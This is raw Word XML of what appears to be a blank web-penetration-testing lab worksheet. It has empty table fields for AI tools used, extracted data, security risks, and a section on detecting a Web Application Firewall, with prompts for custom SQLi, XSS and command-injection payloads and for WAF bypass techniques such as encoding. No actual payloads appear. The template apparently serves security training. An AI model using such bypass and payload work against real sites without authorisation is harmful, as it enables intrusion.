          <w:p w14:paraId="3F669636" w14:textId="0C734070" w:rsidR="004E485B" w:rsidRPr="00C33AE8" w:rsidRDefault="00C33AE8" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C33AE8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Comments, Hidden Fields, Inline Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D9D5FF2" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F4A5348" w14:textId="77777777" w:rsidR="008E6CF9" w:rsidRDefault="008E6CF9" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7976A7F1" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E485B" w14:paraId="51EC4F74" w14:textId="77777777" w:rsidTr="00397240">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C510DED" w14:textId="77777777" w:rsidR="004E485B" w:rsidRPr="00310D3A" w:rsidRDefault="004E485B" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B458B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AI-Based </w:t>
            </w:r>
            <w:r w:rsidRPr="00710E80">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Automation &amp; Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C903F06" w14:textId="77777777" w:rsidR="004E485B" w:rsidRPr="00C54B08" w:rsidRDefault="004E485B" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AI Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54CEA1D2" w14:textId="4BD28DDC" w:rsidR="004E485B" w:rsidRPr="008B458B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B458B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidR="00FE6FF4" w:rsidRPr="00FE6FF4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ChatGPT, PentestGPT, Copilot, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="008B458B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1622CA8F" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FC19E8C" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E485B" w14:paraId="3C06F996" w14:textId="77777777" w:rsidTr="00397240">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71B0F2E0" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C625E22" w14:textId="78ED5831" w:rsidR="004E485B" w:rsidRPr="00C54B08" w:rsidRDefault="004E485B" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54C20169" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31BD08CA" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E485B" w14:paraId="6D89C0E7" w14:textId="77777777" w:rsidTr="00397240">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72A1BEEA" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42260587" w14:textId="5E391336" w:rsidR="004E485B" w:rsidRPr="00C54B08" w:rsidRDefault="006D3C7E" w:rsidP="00397240">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3C7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Extracted Data Saved in Output Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47AEE2E2" w14:textId="3845E015" w:rsidR="004E485B" w:rsidRDefault="006D3C7E" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3C7E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Text, JSON, CSV, etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B42E5F3" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="707C59B1" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E485B" w14:paraId="11DDF503" w14:textId="77777777" w:rsidTr="004233C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58BA4372" w14:textId="0FFA9DFD" w:rsidR="004E485B" w:rsidRPr="00FE01D5" w:rsidRDefault="004E485B" w:rsidP="004233C4">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A5D16">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Potential Security Risks Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7CBA4B0C" w14:textId="7BF71B57" w:rsidR="004E485B" w:rsidRPr="00C54B08" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60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[*</w:t>
            </w:r>
            <w:r w:rsidR="00AA3EB9" w:rsidRPr="00AA3EB9">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Misconfigurations, Data Leakage, etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E485B" w14:paraId="3F52D6EB" w14:textId="77777777" w:rsidTr="004233C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B0D2C11" w14:textId="24955B37" w:rsidR="004E485B" w:rsidRPr="001A5D16" w:rsidRDefault="0070095F" w:rsidP="004233C4">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0070095F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Additional Observations &amp; Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="514F6D37" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F1DC0A1" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6373D5AD" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DD92AFB" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0070095F" w14:paraId="380ECD6D" w14:textId="77777777" w:rsidTr="004233C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="393168C4" w14:textId="7FF94136" w:rsidR="0070095F" w:rsidRPr="0070095F" w:rsidRDefault="0070095F" w:rsidP="004233C4">
            <w:pPr>
              <w:spacing w:before="60" w:after="6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Result Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="106C9F6C" w14:textId="77777777" w:rsidR="0070095F" w:rsidRDefault="0070095F" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78AF8853" w14:textId="77777777" w:rsidR="0070095F" w:rsidRDefault="0070095F" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B574B0E" w14:textId="77777777" w:rsidR="0070095F" w:rsidRDefault="0070095F" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="378D053D" w14:textId="77777777" w:rsidR="0070095F" w:rsidRDefault="0070095F" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25D61031" w14:textId="77777777" w:rsidR="004E485B" w:rsidRDefault="004E485B" w:rsidP="000947B4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ED44B4" w:rsidRPr="000F3EF2" w14:paraId="6DDF99E3" w14:textId="77777777" w:rsidTr="005C0568">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6305BAE4" w14:textId="151CA1B9" w:rsidR="00ED44B4" w:rsidRPr="000F3EF2" w:rsidRDefault="00ED44B4" w:rsidP="008519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1.13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912310" w:rsidRPr="00912310">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Test whether the Target Website is Protected using Web Application Firewall (WAF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65B5279F" w14:textId="77777777" w:rsidR="00ED44B4" w:rsidRPr="004233C4" w:rsidRDefault="00ED44B4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98"/>
        <w:gridCol w:w="3149"/>
        <w:gridCol w:w="3713"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B843A4" w:rsidRPr="00B843A4" w14:paraId="5BCBF389" w14:textId="77777777" w:rsidTr="00AE58F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62840CFF" w14:textId="11EC1D6F" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00AE58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Target </w:t>
            </w:r>
            <w:r w:rsidRPr="00B843A4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7EF36DE5" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00B843A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843A4" w:rsidRPr="00B843A4" w14:paraId="5E2B5A33" w14:textId="77777777" w:rsidTr="00AE58F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3A4AA6A9" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00AE58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843A4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5CE87DB4" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00B843A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843A4" w:rsidRPr="00B843A4" w14:paraId="03F1D1DD" w14:textId="77777777" w:rsidTr="00AE58F3">
        <w:trPr>
          <w:trHeight w:val="1286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40304160" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00AE58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843A4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used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1648DA77" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00B843A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57FEE" w:rsidRPr="00B843A4" w14:paraId="59B4994E" w14:textId="77777777" w:rsidTr="00AE58F3">
        <w:trPr>
          <w:trHeight w:val="854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6ECC8DA9" w14:textId="3BFD0260" w:rsidR="00B57FEE" w:rsidRPr="00B843A4" w:rsidRDefault="00F10796" w:rsidP="00AE58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10796">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTTP Headers Indicating WAF Presence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38636F60" w14:textId="63F52CB7" w:rsidR="00B57FEE" w:rsidRPr="00F10796" w:rsidRDefault="00F10796" w:rsidP="00B843A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1079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[*Server, X-Security, X-CDN, etc.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356E9C" w:rsidRPr="00B843A4" w14:paraId="3B1524F9" w14:textId="77777777" w:rsidTr="00AE58F3">
        <w:trPr>
          <w:trHeight w:val="854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4873EA52" w14:textId="51D9F7F2" w:rsidR="00356E9C" w:rsidRPr="00F10796" w:rsidRDefault="00356E9C" w:rsidP="00AE58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56E9C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Response Codes Indicative of WAF Protection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21F12495" w14:textId="3D2448EA" w:rsidR="00356E9C" w:rsidRPr="00F10796" w:rsidRDefault="00356E9C" w:rsidP="00B843A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3191A" w:rsidRPr="00C3191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403 Forbidden, 406 Not Acceptable, etc.</w:t>
            </w:r>
            <w:r w:rsidR="00C3191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C3191A" w:rsidRPr="00B843A4" w14:paraId="2810F960" w14:textId="77777777" w:rsidTr="00AE58F3">
        <w:trPr>
          <w:trHeight w:val="854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0ACE6453" w14:textId="1B7FB044" w:rsidR="00C3191A" w:rsidRPr="00356E9C" w:rsidRDefault="00C3191A" w:rsidP="00AE58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3191A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Rate Limiting or IP Blocking Observed?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2AEB8318" w14:textId="77479DFC" w:rsidR="00C3191A" w:rsidRDefault="00C3191A" w:rsidP="00B843A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C3191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Details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B843A4" w:rsidRPr="00B843A4" w14:paraId="4416443A" w14:textId="77777777" w:rsidTr="00AE58F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6F0CBB76" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00AE58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843A4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Is </w:t>
            </w:r>
            <w:r w:rsidRPr="00B843A4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Target Website Protected using Web Application Firewall (WAF) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="314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6809633" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00843567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B843A4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="371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E0F17F1" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00843567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B843A4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B843A4" w:rsidRPr="00B843A4" w14:paraId="440FC13B" w14:textId="77777777" w:rsidTr="00AE58F3">
        <w:trPr>
          <w:trHeight w:val="1250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25445072" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00AE58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B843A4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>Response received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48CEE40E" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00B57FE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843A4" w:rsidRPr="00B843A4" w14:paraId="2B9F9ED7" w14:textId="77777777" w:rsidTr="00AE58F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2B74CD9A" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00AE58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843A4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3B004644" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00843567">
            <w:pPr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49476D2" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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E9F2125" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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9C74D86" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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DF5F9A7" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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0774BB0" w14:textId="77777777" w:rsidR="00B843A4" w:rsidRPr="00B843A4" w:rsidRDefault="00B843A4" w:rsidP="00B843A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A7B6B" w:rsidRPr="00B843A4" w14:paraId="794D1506" w14:textId="77777777" w:rsidTr="00AE58F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50F1CC69" w14:textId="557D2FEA" w:rsidR="00BA7B6B" w:rsidRPr="00B843A4" w:rsidRDefault="00BA7B6B" w:rsidP="00AE58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A7B6B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used for Detection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673BB9A0" w14:textId="77777777" w:rsidR="00BA7B6B" w:rsidRPr="00B843A4" w:rsidRDefault="00BA7B6B" w:rsidP="00BA7B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27FF7" w:rsidRPr="00B843A4" w14:paraId="41088AC7" w14:textId="77777777" w:rsidTr="00AE58F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7C157352" w14:textId="0D43F23F" w:rsidR="00927FF7" w:rsidRPr="00BA7B6B" w:rsidRDefault="00927FF7" w:rsidP="00AE58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27FF7">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Custom Payloads Generated for Testing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(If any)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5DF5FD70" w14:textId="2D1E3FEE" w:rsidR="00927FF7" w:rsidRPr="00927FF7" w:rsidRDefault="00927FF7" w:rsidP="00BA7B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927FF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[*SQLi, XSS, Command Injection, etc.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00927FF7" w:rsidRPr="00B843A4" w14:paraId="6C4A5591" w14:textId="77777777" w:rsidTr="00AE58F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647D9FA9" w14:textId="2DC94771" w:rsidR="00927FF7" w:rsidRPr="00927FF7" w:rsidRDefault="004B6A7F" w:rsidP="00AE58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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation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7651E95D" w14:textId="77777777" w:rsidR="00927FF7" w:rsidRDefault="00927FF7" w:rsidP="00BA7B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B292FE1" w14:textId="77777777" w:rsidR="004B6A7F" w:rsidRDefault="004B6A7F" w:rsidP="00BA7B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4B818CF" w14:textId="77777777" w:rsidR="004B6A7F" w:rsidRDefault="004B6A7F" w:rsidP="00BA7B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2630883" w14:textId="77777777" w:rsidR="00AE58F3" w:rsidRPr="00927FF7" w:rsidRDefault="00AE58F3" w:rsidP="00BA7B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4B6A7F" w:rsidRPr="00B843A4" w14:paraId="6B7B7217" w14:textId="77777777" w:rsidTr="00AE58F3">
        <w:trPr>
          <w:trHeight w:val="1133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6228905E" w14:textId="4D331266" w:rsidR="004B6A7F" w:rsidRPr="004B6A7F" w:rsidRDefault="004B6A7F" w:rsidP="00AE58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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Analyzed Responses for Filtering or Blocking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493759C3" w14:textId="77777777" w:rsidR="004B6A7F" w:rsidRPr="00927FF7" w:rsidRDefault="004B6A7F" w:rsidP="00BA7B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4B6A7F" w:rsidRPr="00B843A4" w14:paraId="4ED2240F" w14:textId="77777777" w:rsidTr="00AE58F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70D70AFB" w14:textId="01D2FED3" w:rsidR="004B6A7F" w:rsidRPr="004B6A7F" w:rsidRDefault="007D19F7" w:rsidP="00AE58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D19F7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Bypass Techniques Identified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7287CF53" w14:textId="77777777" w:rsidR="004B6A7F" w:rsidRDefault="004F67D1" w:rsidP="00BA7B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4F67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Encoding, Payload Modification, Rate Control,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77E9911" w14:textId="77777777" w:rsidR="004F67D1" w:rsidRDefault="004F67D1" w:rsidP="00BA7B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4CD30B4" w14:textId="29F097C4" w:rsidR="004F67D1" w:rsidRPr="00927FF7" w:rsidRDefault="004F67D1" w:rsidP="00BA7B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4F67D1" w:rsidRPr="00B843A4" w14:paraId="2FEC78FB" w14:textId="77777777" w:rsidTr="00AE58F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34BFC857" w14:textId="7AC9AABD" w:rsidR="004F67D1" w:rsidRDefault="004F67D1" w:rsidP="00AE58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F67D1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  <w:p w14:paraId="2652260C" w14:textId="77777777" w:rsidR="004F67D1" w:rsidRPr="007D19F7" w:rsidRDefault="004F67D1" w:rsidP="00AE58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6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="388A625E" w14:textId="77777777" w:rsidR="004F67D1" w:rsidRDefault="004F67D1" w:rsidP="00BA7B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7A0A6C" w:rsidRPr="00B843A4" w14:paraId="249DAD2C" w14:textId="77777777" w:rsidTr="00AE58F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0DA85EEE" w14:textId="5062344B" w:rsidR="007A0A6C" w:rsidRDefault="007A0A6C" w:rsidP="00AE58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b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE3B261" w14:textId="77777777" w:rsidR="007A0A6C" w:rsidRPr="004F67D1" w:rsidRDefault="007A0A6C" w:rsidP="00AE58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6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
